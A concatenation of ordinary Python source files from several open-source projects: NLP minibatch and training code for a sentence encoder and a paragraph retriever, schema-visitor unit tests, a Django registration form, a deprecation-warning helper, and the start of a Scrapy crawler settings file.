self.text2label[line[2]]
for line in lines[index : index + batch_size]
]
sent1_lens = [len(line) for line in sent1]
sorted_sent1_indices = np.argsort(sent1_lens)[::-1]
sorted_sent1_lines = [sent1[idx] for idx in sorted_sent1_indices]
rev_sent1 = np.argsort(sorted_sent1_indices)
sent2_lens = [len(line) for line in sent2]
sorted_sent2_indices = np.argsort(sent2_lens)[::-1]
sorted_sent2_lines = [sent2[idx] for idx in sorted_sent2_indices]
rev_sent2 = np.argsort(sorted_sent2_indices)
sorted_sent1_lens = [len(line) for line in sorted_sent1_lines]
sorted_sent2_lens = [len(line) for line in sorted_sent2_lines]
max_sent1_len = max(sorted_sent1_lens)
max_sent2_len = max(sorted_sent2_lens)
sent1 = [
[
self.word2id[w] if w in self.word2id else self.word2id["<unk>"]
for w in line
]
+ [self.word2id["<pad>"]] * (max_sent1_len - len(line))
for line in sorted_sent1_lines
]
sent2 = [
[
self.word2id[w] if w in self.word2id else self.word2id["<unk>"]
for w in line
]
+ [self.word2id["<pad>"]] * (max_sent2_len - len(line))
for line in sorted_sent2_lines
]
sent1 = Variable(torch.LongTensor(sent1)).cuda()
sent2 = Variable(torch.LongTensor(sent2)).cuda()
labels = Variable(torch.LongTensor(labels)).cuda()
sent1_lens = (
Variable(torch.LongTensor(sorted_sent1_lens), requires_grad=False)
.squeeze()
.cuda()
)
sent2_lens = (
Variable(torch.LongTensor(sorted_sent2_lens), requires_grad=False)
.squeeze()
.cuda()
)
rev_sent1 = (
Variable(torch.LongTensor(rev_sent1), requires_grad=False)
.squeeze()
.cuda()
)
rev_sent2 = (
Variable(torch.LongTensor(rev_sent2), requires_grad=False)
.squeeze()
.cuda()
)
return {
"sent1": sent1,
"sent2": sent2,
"sent1_lens": sent1_lens,
"sent2_lens": sent2_lens,
"rev_sent1": rev_sent1,
"rev_sent2": rev_sent2,
"labels": labels,
"type": "nli",
}
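# --- Editor's illustrative sketch (not part of the original module). ---
# The sort / un-sort index trick used above for packed padded sequences: sort by
# decreasing length, then keep the argsort of the sort order to restore the
# original ordering after the RNN pass.
def _demo_sort_unsort():
    lens = [3, 5, 2]
    sorted_idx = np.argsort(lens)[::-1]  # order by decreasing length -> [1, 0, 2]
    rev_idx = np.argsort(sorted_idx)     # indices that undo the sort
    print(sorted_idx[rev_idx])           # [0, 1, 2]: original order restored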
def get_validation_minibatch(
src, trg, index, batch_size, src_word2id, trg_word2id
):
"""Prepare minibatch.
Args:
src(list): source data.
trg(list): target data.
index(int): index for the file.
batch_size(int): batch size.
src_word2id(dict): Word to index mapping for source.
trg_word2id(dict): Word to index mapping for target.
Returns:
Dict for seq2seq model.
"""
src_lines = [
["<s>"] + line + ["</s>"] for line in src[index : index + batch_size]
]
trg_lines = [
["<s>"] + line + ["</s>"] for line in trg[index : index + batch_size]
]
src_lens = [len(line) for line in src_lines]
sorted_indices = np.argsort(src_lens)[::-1]
sorted_src_lines = [src_lines[idx] for idx in sorted_indices]
sorted_trg_lines = [trg_lines[idx] for idx in sorted_indices]
sorted_src_lens = [len(line) for line in sorted_src_lines]
sorted_trg_lens = [len(line) for line in sorted_trg_lines]
max_src_len = max(sorted_src_lens)
max_trg_len = max(sorted_trg_lens)
input_lines_src = [
[src_word2id[w] if w in src_word2id else src_word2id["<unk>"] for w in line]
+ [src_word2id["<pad>"]] * (max_src_len - len(line))
for line in sorted_src_lines
]
input_lines_trg = [
[
trg_word2id[w] if w in trg_word2id else trg_word2id["<unk>"]
for w in line[:-1]
]
+ [trg_word2id["<pad>"]] * (max_trg_len - len(line))
for line in sorted_trg_lines
]
output_lines_trg = [
[
trg_word2id[w] if w in trg_word2id else trg_word2id["<unk>"]
for w in line[1:]
]
+ [trg_word2id["<pad>"]] * (max_trg_len - len(line))
for line in sorted_trg_lines
]
# For pytorch 0.4
with torch.no_grad():
input_lines_src = Variable(torch.LongTensor(input_lines_src)).cuda()
input_lines_trg = Variable(torch.LongTensor(input_lines_trg)).cuda()
output_lines_trg = Variable(torch.LongTensor(output_lines_trg)).cuda()
# sorted_src_lens = Variable(
# torch.LongTensor(sorted_src_lens)
# ).squeeze().cuda()
sorted_src_lens = (
Variable(torch.LongTensor(sorted_src_lens))
.view(len(sorted_src_lens))
.cuda()
)
return {
"input_src": input_lines_src,
"input_trg": input_lines_trg,
"output_trg": output_lines_trg,
"src_lens": sorted_src_lens,
"type": "seq2seq",
}
def compute_validation_loss(
config, model, train_iterator, criterion, task_idx, lowercase=False
):
"""Compute validation loss for a task.
Args:
config(dict): configuration list.
model(MultitaskModel): model.
train_iterator(BufferedDataIterator): Multi Parallel corpus data iterator.
criterion(nn.CrossEntropyLoss): criterion function for loss.
task_idx(int): Task index.
lowercase(bool): If lowercase the data.
Returns: float as the mean of the loss.
"""
val_src = config["data"]["paths"][task_idx]["val_src"]
val_trg = config["data"]["paths"][task_idx]["val_trg"]
if lowercase:
val_src = [
line.strip().lower().split()
for line in open(val_src, "r", encoding="utf-8")
]
val_trg = [
line.strip().lower().split()
for line in open(val_trg, "r", encoding="utf-8")
]
else:
val_src = [
line.strip().split()
for line in open(val_src, "r", encoding="utf-8")
]
val_trg = [
line.strip().split()
for line in open(val_trg, "r", encoding="utf-8")
]
batch_size = config["training"]["batch_size"]
losses = []
for j in range(0, len(val_src), batch_size):
minibatch = get_validation_minibatch(
val_src,
val_trg,
j,
batch_size,
train_iterator.src[task_idx]["word2id"],
train_iterator.trg[task_idx]["word2id"],
)
decoder_logit = model(minibatch, task_idx)
loss = criterion(
decoder_logit.contiguous().view(-1, decoder_logit.size(2)),
minibatch["output_trg"].contiguous().view(-1),
)
# losses.append(loss.data[0])
losses.append(loss.item())
return np.mean(losses)
# Original source: https://github.com/Maluuba/gensen
|
paragraph_encoder/train_para_encoder.py | rajarshd/Multi-Step-Reasoning | 122 | 12797166 | <filename>paragraph_encoder/train_para_encoder.py
import torch
import numpy as np
import json
import os
import pickle
import sys
import logging
import shutil
from tqdm import tqdm
from torch.autograd import Variable
import torch.optim as optim
import torch.nn.functional as F
from torch.utils.data.sampler import RandomSampler
import config
from model import utils, data, vector
from model.retriever import LSTMRetriever
from multi_corpus import MultiCorpus
from torch.utils.data.sampler import SequentialSampler, RandomSampler
import math
logger = logging.getLogger()
global_timer = utils.Timer()
stats = {'timer': global_timer, 'epoch': 0, 'best_valid': 0, 'best_verified_valid': 0, 'best_acc': 0, 'best_verified_acc': 0}
def make_data_loader(args, corpus, train_time=False):
dataset = data.MultiCorpusDataset(
args,
corpus,
args.word_dict,
args.feature_dict,
single_answer=False,
para_mode=args.para_mode,
train_time=train_time
)
sampler = SequentialSampler(dataset) if not train_time else RandomSampler(dataset)
loader = torch.utils.data.DataLoader(
dataset,
batch_size=args.batch_size,
sampler=sampler,
num_workers=args.data_workers,
collate_fn=vector.batchify(args, args.para_mode, train_time=train_time),
pin_memory=True
)
return loader
def init_from_checkpoint(args):
logger.info('Loading model from saved checkpoint {}'.format(args.pretrained))
model = torch.load(args.pretrained)
word_dict = model['word_dict']
feature_dict = model['feature_dict']
args.vocab_size = len(word_dict)
args.embedding_dim_orig = args.embedding_dim
args.word_dict = word_dict
args.feature_dict = feature_dict
ret = LSTMRetriever(args, word_dict, feature_dict)
# load saved param values
ret.model.load_state_dict(model['state_dict']['para_clf'])
optimizer = None
parameters = ret.get_trainable_params()
if args.optimizer == 'sgd':
optimizer = optim.SGD(parameters, args.learning_rate,
momentum=args.momentum,
weight_decay=args.weight_decay)
elif args.optimizer == 'adamax':
optimizer = optim.Adamax(parameters,
weight_decay=args.weight_decay)
elif args.optimizer == 'nag':
optimizer = NAG(parameters, args.learning_rate, momentum=args.momentum,
weight_decay=args.weight_decay)
else:
raise RuntimeError('Unsupported optimizer: %s' % args.optimizer)
optimizer.load_state_dict(model['state_dict']['optimizer'])
logger.info('Model loaded...')
return ret, optimizer, word_dict, feature_dict
def init_from_scratch(args, train_exs):
logger.info('Initializing model from scratch')
word_dict = feature_dict = None
# create or get vocab
word_dict = utils.build_word_dict(args, train_exs)
if word_dict is not None:
args.vocab_size = len(word_dict)
args.embedding_dim_orig = args.embedding_dim
args.word_dict = word_dict
args.feature_dict = feature_dict
ret = LSTMRetriever(args, word_dict, feature_dict)
# --------------------------------------------------------------------------
# TRAIN/VALID LOOP
# --------------------------------------------------------------------------
# train
parameters = ret.get_trainable_params()
optimizer = None
if parameters is not None and len(parameters) > 0:
if args.optimizer == 'sgd':
optimizer = optim.SGD(parameters, args.learning_rate,
momentum=args.momentum,
weight_decay=args.weight_decay)
elif args.optimizer == 'adamax':
optimizer = optim.Adamax(parameters,
weight_decay=args.weight_decay)
elif args.optimizer == 'nag':
optimizer = NAG(parameters, args.learning_rate, momentum=args.momentum,
weight_decay=args.weight_decay)
else:
raise RuntimeError('Unsupported optimizer: %s' % args.optimizer)
else:
pass
return ret, optimizer, word_dict, feature_dict
def train_binary_classification(args, ret_model, optimizer, train_loader, verified_dev_loader=None):
args.train_time = True
para_loss = utils.AverageMeter()
ret_model.model.train()
for idx, ex in enumerate(train_loader):
if ex is None:
continue
inputs = [e if e is None or type(e) != type(ex[0]) else Variable(e.cuda(non_blocking=True))
for e in ex[:]]
ret_input = [*inputs[:4]]
scores, _, _ = ret_model.score_paras(*ret_input)
y_num_occurrences = Variable(ex[-2])
labels = (y_num_occurrences > 0).float()
labels = labels.cuda()
# BCE logits loss
batch_para_loss = F.binary_cross_entropy_with_logits(scores.squeeze(1), labels)
optimizer.zero_grad()
batch_para_loss.backward()
torch.nn.utils.clip_grad_norm(ret_model.get_trainable_params(),
2.0)
optimizer.step()
para_loss.update(batch_para_loss.data.item())
if math.isnan(para_loss.avg):
import pdb
pdb.set_trace()
if idx % 25 == 0 and idx > 0:
logger.info('Epoch = {} | iter={}/{} | para loss = {:2.4f}'.format(
stats['epoch'],
idx, len(train_loader),
para_loss.avg))
para_loss.reset()
def eval_binary_classification(args, ret_model, corpus, dev_loader, verified_dev_loader=None, save_scores = True):
total_exs = 0
args.train_time = False
ret_model.model.eval()
accuracy = 0.0
for idx, ex in enumerate(tqdm(dev_loader)):
if ex is None:
raise BrokenPipeError
inputs = [e if e is None or type(e) != type(ex[0]) else Variable(e.cuda(non_blocking=True))
for e in ex[:]]
ret_input = [*inputs[:4]]
total_exs += ex[0].size(0)
scores, _, _ = ret_model.score_paras(*ret_input)
scores = F.sigmoid(scores)
y_num_occurrences = Variable(ex[-2])
labels = (y_num_occurrences > 0).float()
labels = labels.data.numpy()
scores = scores.cpu().data.numpy()
scores = scores.reshape((-1))
if save_scores:
for i, pid in enumerate(ex[-1]):
corpus.paragraphs[pid].model_score = scores[i]
scores = scores > 0.5
a = scores == labels
accuracy += a.sum()
logger.info('Eval accuracy = {} '.format(accuracy/total_exs))
top1 = get_topk(corpus)
return top1
def print_vectors(args, para_vectors, question_vectors, corpus, train=False, test=False):
all_question_vectors = []
all_para_vectors = []
qid2idx = {}
cum_num_lens = []
all_correct_ans = {}
cum_num_len = 0
for question_i, qid in enumerate(corpus.questions):
labels = []
all_question_vectors.append(question_vectors[qid])
qid2idx[qid] = question_i
cum_num_len += len(corpus.questions[qid].pids)
cum_num_lens.append(cum_num_len)
for para_i, pid in enumerate(corpus.questions[qid].pids):
if corpus.paragraphs[pid].ans_occurance > 0:
labels.append(para_i)
all_para_vectors.append(para_vectors[pid])
all_correct_ans[qid] = labels
all_para_vectors = np.stack(all_para_vectors)
all_question_vectors = np.stack(all_question_vectors)
assert all_para_vectors.shape[0] == cum_num_lens[-1]
assert all_question_vectors.shape[0] == len(cum_num_lens)
assert all_question_vectors.shape[0] == len(qid2idx)
assert all_question_vectors.shape[0] == len(all_correct_ans)
## saving code
if train:
OUT_DIR = os.path.join(args.save_dir, args.src, args.domain, "train/")
else:
if args.is_test == 0:
OUT_DIR = os.path.join(args.save_dir, args.src, args.domain, "dev/")
else:
OUT_DIR = os.path.join(args.save_dir, args.src, args.domain, "test/")
logger.info("Printing vectors at {}".format(OUT_DIR))
if not os.path.exists(OUT_DIR):
os.makedirs(OUT_DIR)
else:
shutil.rmtree(OUT_DIR, ignore_errors=True)
os.makedirs(OUT_DIR)
json.dump(qid2idx, open(OUT_DIR + 'map.json', 'w'))
json.dump(all_correct_ans, open(OUT_DIR + 'correct_paras.json', 'w'))
all_cumlen = np.array(cum_num_lens)
np.save(OUT_DIR + "document", all_para_vectors)
np.save(OUT_DIR + "question", all_question_vectors)
np.save(OUT_DIR + "all_cumlen", cum_num_lens)
def save_vectors(args, ret_model, corpus, data_loader, verified_dev_loader=None, save_scores = True, train=False, test=False):
total_exs = 0
args.train_time = False
ret_model.model.eval()
para_vectors = {}
question_vectors = {}
for idx, ex in enumerate(tqdm(data_loader)):
if ex is None:
raise BrokenPipeError
inputs = [e if e is None or type(e) != type(ex[0]) else Variable(e.cuda(non_blocking=True))
for e in ex[:]]
ret_input = [*inputs[:4]]
total_exs += ex[0].size(0)
scores, doc, ques = ret_model.score_paras(*ret_input)
scores = scores.cpu().data.numpy()
scores = scores.reshape((-1))
if save_scores:
for i, pid in enumerate(ex[-1]):
para_vectors[pid] = doc[i]
for i, qid in enumerate([corpus.paragraphs[pid].qid for pid in ex[-1]]):
if qid not in question_vectors:
question_vectors[qid] = ques[i]
for i, pid in enumerate(ex[-1]):
corpus.paragraphs[pid].model_score = scores[i]
get_topk(corpus)
print_vectors(args, para_vectors, question_vectors, corpus, train, test)
def get_topk(corpus):
top1 = 0
top3 = 0
top5 = 0
for qid in corpus.questions:
para_scores = [(corpus.paragraphs[pid].model_score,corpus.paragraphs[pid].ans_occurance ) for pid in corpus.questions[qid].pids]
sorted_para_scores = sorted(para_scores, key=lambda x: x[0], reverse=True)
if sorted_para_scores[0][1] > 0:
top1 += 1
if sum([ans[1] for ans in sorted_para_scores[:3]]) > 0:
top3 += 1
if sum([ans[1] for ans in sorted_para_scores[:5]]) > 0:
top5 += 1
top1 = top1/len(corpus.questions)
top3 = top3/len(corpus.questions)
top5 = top5/len(corpus.questions)
logger.info('top1 = {}, top3 = {}, top5 = {} '.format(top1, top3 ,top5 ))
return top1
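# --- Editor's illustrative sketch (not part of the original script). ---
# Top-k accuracy on a tiny hand-built corpus. The SimpleNamespace stand-ins below are
# hypothetical and only mimic the attributes that get_topk reads
# (questions[qid].pids, paragraphs[pid].model_score / .ans_occurance).
def _demo_get_topk():
    from types import SimpleNamespace
    corpus = SimpleNamespace(
        questions={'q1': SimpleNamespace(pids=['p1', 'p2'])},
        paragraphs={
            'p1': SimpleNamespace(model_score=0.9, ans_occurance=1),
            'p2': SimpleNamespace(model_score=0.4, ans_occurance=0),
        },
    )
    return get_topk(corpus)  # top1 == 1.0 for this toy corpus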
def get_topk_tfidf(corpus):
top1 = 0
top3 = 0
top5 = 0
for qid in corpus.questions:
para_scores = [(corpus.paragraphs[pid].tfidf_score, corpus.paragraphs[pid].ans_occurance) for pid in
corpus.questions[qid].pids]
sorted_para_scores = sorted(para_scores, key=lambda x: x[0])
# import pdb
# pdb.set_trace()
if sorted_para_scores[0][1] > 0:
top1 += 1
if sum([ans[1] for ans in sorted_para_scores[:3]]) > 0:
top3 += 1
if sum([ans[1] for ans in sorted_para_scores[:5]]) > 0:
top5 += 1
logger.info(
'top1 = {}, top3 = {}, top5 = {} '.format(top1 / len(corpus.questions), top3 / len(corpus.questions),
top5 / len(corpus.questions)))
def run_predictions(args, data_loader, model, eval_on_train_set=False):
args.train_time = False
top_1 = 0
top_3 = 0
top_5 = 0
total_num_questions = 0
map_counter = 0
cum_num_lens = []
qid2idx = {}
sum_num_paras = 0
all_correct_answers = {}
for ex_counter, ex in tqdm(enumerate(data_loader)):
ret_input = [*ex]
y_num_occurrences = ex[3]
labels = (y_num_occurrences > 0)
try:
topk_paras, docs, ques = model.return_topk(5,*ret_input)
except RuntimeError:
import pdb
pdb.set_trace()
num_paras = ex[1]
qids = ex[-1]
if args.save_para_clf_output:
docs = docs.cpu().data.numpy()
ques = ques.cpu().data.numpy()
if ex_counter == 0:
documents = docs
questions = ques
else:
documents = np.concatenate([documents, docs])
questions = np.concatenate([questions, ques])
### create map and cum_num_lens
for i, qid in enumerate(qids):
qid2idx[qid] = map_counter
sum_num_paras += num_paras[i]
cum_num_lens.append(sum_num_paras)
all_correct_answers[map_counter] = []
st = sum(num_paras[:i])
for j in range(num_paras[i]):
if labels[st+j] == 1:
all_correct_answers[map_counter].append(j)
### Test case:
assert len(all_correct_answers[map_counter]) == sum(labels.data.numpy()[st: st + num_paras[i]])
map_counter += 1
counter = 0
for q_counter, ranked_para_ids in enumerate(topk_paras):
total_num_questions += 1
for i, no_paras in enumerate(ranked_para_ids):
if labels[counter + no_paras] == 1:
if i <= 4:
top_5 += 1
if i <= 2:
top_3 += 1
if i <= 0:
top_1 += 1
break
counter += num_paras[q_counter]
logger.info('Accuracy of para classifier when evaluated on the annotated dev set.')
logger.info('top-1: {:2.4f}, top-3: {:2.4f}, top-5: {:2.4f}'.format(
(top_1 * 1.0 / total_num_questions),
(top_3 * 1.0 / total_num_questions),
(top_5 * 1.0 / total_num_questions)))
## saving code
if args.save_para_clf_output:
if eval_on_train_set:
OUT_DIR = "/iesl/canvas/sdhuliawala/vectors_web/train/"
else:
OUT_DIR = "/iesl/canvas/sdhuliawala/vectors_web/dev/"
if not os.path.exists(OUT_DIR):
os.mkdir(OUT_DIR)
else:
shutil.rmtree(OUT_DIR, ignore_errors=True)
os.mkdir(OUT_DIR)
#Test cases
assert cum_num_lens[-1] == documents.shape[0]
assert questions.shape[0] == documents.shape[0]
assert len(cum_num_lens) == len(qid2idx)
assert len(cum_num_lens) == len(all_correct_answers)
json.dump(qid2idx, open(OUT_DIR + 'map.json', 'w'))
json.dump(all_correct_answers, open(OUT_DIR + 'correct_paras.json', 'w'))
all_cumlen = np.array(cum_num_lens)
np.save(OUT_DIR + "document", documents)
np.save(OUT_DIR + "question", questions)
np.save(OUT_DIR + "all_cumlen", all_cumlen)
return (top_1 * 1.0 / total_num_questions), (top_3 * 1.0 / total_num_questions), (top_5 * 1.0 / total_num_questions)
def save(args, model, optimizer, filename, epoch=None):
params = {
'state_dict': {
'para_clf': model.state_dict(),
'optimizer': optimizer.state_dict()
},
'word_dict': args.word_dict,
'feature_dict': args.feature_dict
}
args.word_dict = None
args.feature_dict = None
params['config'] = vars(args)
if epoch:
params['epoch'] = epoch
try:
torch.save(params, filename)
# bad hack for not saving dictionary twice
args.word_dict = params['word_dict']
args.feature_dict = params['feature_dict']
except BaseException:
logger.warn('[ WARN: Saving failed... continuing anyway. ]')
# ------------------------------------------------------------------------------
# Main.
# ------------------------------------------------------------------------------
def main(args):
# PRINT CONFIG
logger.info('-' * 100)
logger.info('CONFIG:\n%s' % json.dumps(vars(args), indent=4, sort_keys=True))
# small can't test
if args.small == 1:
args.test = 0
if args.small == 1:
args.train_file_name = args.train_file_name + "_small"
args.dev_file_name = args.dev_file_name + "_small"
if args.test == 1:
args.test_file_name = args.test_file_name + "_small"
args.train_file_name = args.train_file_name + ".pkl"
args.dev_file_name = args.dev_file_name + ".pkl"
if args.test == 1:
args.test_file_name = args.test_file_name + ".pkl"
logger.info("Loading pickle files")
fin = open(os.path.join(args.data_dir, args.src, "data", args.domain, args.train_file_name), "rb")
all_train_exs = pickle.load(fin)
fin.close()
fin = open(os.path.join(args.data_dir, args.src, "data", args.domain, args.dev_file_name), "rb")
all_dev_exs = pickle.load(fin)
fin.close()
if args.test == 1:
fin = open(os.path.join(args.data_dir, args.src, "data", args.domain, args.test_file_name), "rb")
all_test_exs = pickle.load(fin)
fin.close()
logger.info("Loading done!")
logger.info("Num train examples {}".format(len(all_train_exs.paragraphs)))
logger.info("Num dev examples {}".format(len(all_dev_exs.paragraphs)))
if args.test == 1:
logger.info("Num test examples {}".format(len(all_test_exs.paragraphs)))
if args.pretrained is None:
ret_model, optimizer, word_dict, feature_dict = init_from_scratch(args, all_train_exs)
else:
ret_model, optimizer, word_dict, feature_dict = init_from_checkpoint(args)
# make data loader
logger.info("Making data loaders...")
if word_dict is None:
args.word_dict = utils.build_word_dict(args, (all_train_exs, all_dev_exs))
word_dict = args.word_dict
train_loader = make_data_loader(args, all_train_exs, train_time=False) if args.eval_only else make_data_loader(args, all_train_exs, train_time=True)
dev_loader = make_data_loader(args, all_dev_exs)
if args.test:
test_loader = make_data_loader(args, all_test_exs)
if args.eval_only:
logger.info("Saving dev paragraph vectors")
save_vectors(args, ret_model, all_dev_exs, dev_loader, verified_dev_loader=None)
logger.info("Saving train paragraph vectors")
save_vectors(args, ret_model, all_train_exs, train_loader, verified_dev_loader=None, train=True)
if args.test:
args.is_test = 1
logger.info("Saving test paragraph vectors")
save_vectors(args, ret_model, all_test_exs, test_loader, verified_dev_loader=None)
else:
get_topk_tfidf(all_dev_exs)
for epoch in range(args.num_epochs):
stats['epoch'] = epoch
train_binary_classification(args, ret_model, optimizer, train_loader, verified_dev_loader=None)
logger.info('checkpointing model at {}'.format(args.model_file))
## check pointing##
save(args, ret_model.model, optimizer, args.model_file+".ckpt", epoch=stats['epoch'])
logger.info("Evaluating on the full dev set....")
top1 = eval_binary_classification(args, ret_model, all_dev_exs, dev_loader, verified_dev_loader=None)
if stats['best_acc'] < top1:
stats['best_acc'] = top1
logger.info('Best accuracy {}'.format(stats['best_acc']))
logger.info('Saving model at {}'.format(args.model_file))
logger.info("Logs saved at {}".format(args.log_file))
save(args, ret_model.model, optimizer, args.model_file, epoch=stats['epoch'])
if __name__ == '__main__':
# MODEL
logger.info('-' * 100)
# Parse cmdline args and setup environment
args = config.get_args()
# Set cuda
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
torch.cuda.set_device(args.gpu)
# Set random state
np.random.seed(args.random_seed)
torch.manual_seed(args.random_seed)
if args.cuda:
torch.cuda.manual_seed(args.random_seed)
# Set logging
logger.setLevel(logging.INFO)
fmt = logging.Formatter('%(asctime)s: %(message)s', '%m/%d/%Y %I:%M:%S %p')
console = logging.StreamHandler()
console.setFormatter(fmt)
logger.addHandler(console)
if args.log_file:
if args.checkpoint:
logfile = logging.FileHandler(args.log_file, 'a')
else:
logfile = logging.FileHandler(args.log_file, 'w')
logfile.setFormatter(fmt)
logger.addHandler(logfile)
logger.info('[ COMMAND: %s ]' % ' '.join(sys.argv))
# Run!
main(args) |
orchestra/tests/workflows/test_dir/load_sample_data.py | code-review-doctor/orchestra | 444 | 12797174 | <reponame>code-review-doctor/orchestra
def load(workflow_version):
""" Dummy loading function. """
pass
|
tests/schema/test_visitor.py | mabrains/ALIGN-public | 119 | 12797262 | import pytest
from align.schema.types import BaseModel, Optional, List, Dict
from align.schema.visitor import Visitor, Transformer, cache
@pytest.fixture
def dummy():
class DummyModel(BaseModel):
arg1: str
arg2: Optional[str]
arg3: List[str]
arg4: List[Optional[str]]
arg5: Dict[str, str]
arg6: Dict[str, Optional[str]]
arg7: "Optional[DummyModel]"
arg8: "Optional[List[DummyModel]]"
DummyModel.update_forward_refs()
base = DummyModel(
arg1 = 'arg1',
arg3 = ['arg3_1', 'arg3_2'],
arg4 = [],
arg5 = {'arg5_k': 'arg5_v'},
arg6 = {'arg6_k': None}
)
dummy = DummyModel(
arg1 = 'arg1',
arg3 = ['arg3_1', 'arg3_2'],
arg4 = [],
arg5 = {'arg5_k': 'arg5_v'},
arg6 = {'arg6_k': None},
arg7 = base,
arg8 = [base, base]
)
return dummy
def test_visitor_no_output(dummy):
assert Visitor().visit(dummy) == []
def test_visitor_raw_output(dummy):
class StrValVisitor(Visitor):
def visit_str(self, node):
return node
assert StrValVisitor().visit(dummy) == [
'arg1',
'arg3_1',
'arg3_2',
'arg5_v',
'arg1',
'arg3_1',
'arg3_2',
'arg5_v',
'arg1',
'arg3_1',
'arg3_2',
'arg5_v',
'arg1',
'arg3_1',
'arg3_2',
'arg5_v',
]
def test_visitor_processed_output(dummy):
class DummyCounter(Visitor):
'''Simply counts the number of times the dummy class is encountered'''
def visit_DummyModel(self, node):
return sum(self.generic_visit(node)) + 1
assert DummyCounter().visit(dummy) == 4
def test_transformer_no_visitor(dummy):
assert Transformer().visit(dummy.arg1) is dummy.arg1
assert Transformer().visit(dummy.arg2) is dummy.arg2
assert Transformer().visit(dummy.arg3) is dummy.arg3
assert Transformer().visit(dummy.arg4) is dummy.arg4
assert Transformer().visit(dummy.arg5) is dummy.arg5
assert Transformer().visit(dummy.arg6) is dummy.arg6
assert Transformer().visit(dummy.arg7) is dummy.arg7
assert Transformer().visit(dummy.arg8) is dummy.arg8
assert Transformer().visit(dummy) is dummy
def test_transformer_string_visitor(dummy):
class AddStringPrefix(Transformer):
def visit_str(self, node):
return 'prefix_' + node
transformed = AddStringPrefix().visit(dummy)
assert isinstance(transformed, dummy.__class__)
# String in subtree
assert transformed.arg1 == 'prefix_arg1'
assert transformed.arg1 is not dummy.arg1
# No string in subtree
assert transformed.arg2 == None
assert transformed.arg2 is dummy.arg2
# String in subtree
assert transformed.arg3 == ['prefix_arg3_1', 'prefix_arg3_2']
assert transformed.arg3 is not dummy.arg3
# No string in subtree
assert transformed.arg4 == []
assert transformed.arg4 is dummy.arg4, f'old:({id(dummy.arg4)}, {dummy.arg4}), new:({id(transformed.arg4)}, {transformed.arg4})'
# String in subtree
assert transformed.arg5 == {'arg5_k': 'prefix_arg5_v'}
assert transformed.arg5 is not dummy.arg5
# No string in subtree
assert transformed.arg6 == {'arg6_k': None}
assert transformed.arg6 is dummy.arg6
# Expected result for arg7 and arg8
basedict = {'arg1': 'prefix_arg1',
'arg2': None,
'arg3': ['prefix_arg3_1',
'prefix_arg3_2'],
'arg4': [],
'arg5': {'arg5_k': 'prefix_arg5_v'},
'arg6': {'arg6_k': None},
'arg7': None,
'arg8': None}
# String in subtree
assert transformed.arg7 == basedict
assert transformed.arg7 is not dummy.arg7
# String in subtree
assert transformed.arg8 == [basedict, basedict]
assert transformed.arg8 is not dummy.arg8
# Ensure cache is working for generic_visitor
assert transformed.arg7 is transformed.arg8[0]
assert transformed.arg8[0] is transformed.arg8[1]
def test_cache(dummy):
class UncachedTransformer(Transformer):
def visit_DummyModel(self, node):
if not hasattr(self, 'top'):
self.top = node
return self.generic_visit(node)
else:
return node.copy()
control = UncachedTransformer().visit(dummy)
assert control.arg7 is not control.arg8[0]
assert control.arg8[0] is not control.arg8[1]
class CachedTransformer(Transformer):
@cache # DO THIS FOR MOST VISITORS
def visit_DummyModel(self, node):
if not hasattr(self, 'top'):
self.top = node
return self.generic_visit(node)
else:
return node.copy()
transformed = CachedTransformer().visit(dummy)
assert transformed.arg7 is transformed.arg8[0]
assert transformed.arg8[0] is transformed.arg8[1]
|
djangoerp/registration/forms.py | xarala221/django-erp | 345 | 12797325 | <filename>djangoerp/registration/forms.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
"""This file is part of the django ERP project.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
__author__ = '<NAME> <<EMAIL>>'
__copyright__ = 'Copyright (c) 2013-2015, django ERP Team'
__version__ = '0.0.5'
from django import forms
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from djangoerp.core.forms.auth import UserForm
class UserRegistrationForm(UserForm):
"""Form for user registration.
"""
def __init__(self, *args, **kwargs):
super(UserRegistrationForm, self).__init__(*args, **kwargs)
# Improved security.
# `self.fields` is a dict of form fields, so membership (not hasattr) is the right check.
if 'is_admin' in self.fields: self.fields.pop('is_admin')
if 'is_staff' in self.fields: self.fields.pop('is_staff')
if 'is_active' in self.fields: self.fields.pop('is_active')
if 'is_superuser' in self.fields: self.fields.pop('is_superuser')
if 'groups' in self.fields: self.fields.pop('groups')
if 'user_permissions' in self.fields: self.fields.pop('user_permissions')
|
mpunet/errors/deprecated_warnings.py | alexsosn/MultiPlanarUNet | 156 | 12797402 | from mpunet.logging import ScreenLogger
def warn_sparse_param(logger):
logger = logger or ScreenLogger()
sparse_err = "mpunet 0.1.3 or higher requires integer targets" \
" as opposed to one-hot encoded targets. Setting the 'sparse'" \
" parameter no longer has any effect and may not be allowed" \
" in future versions."
logger.warn(sparse_err)
|
crawler/house_renting/settings.py | bernssolg/house-renting-master | 823 | 12797482 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
from house_renting.spider_settings import lianjia, a58
BOT_NAME = 'house_renting'
COMMANDS_MODULE = 'house_renting.commands'
SPIDER_MODULES = ['house_renting.spiders']
NEWSPIDER_MODULE = 'house_renting.spiders'
USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \
'Safari/605.1.15 '
USER_AGENTS = (
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; '
'.NET CLR 3.0.04506)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR '
'2.0.50727)',
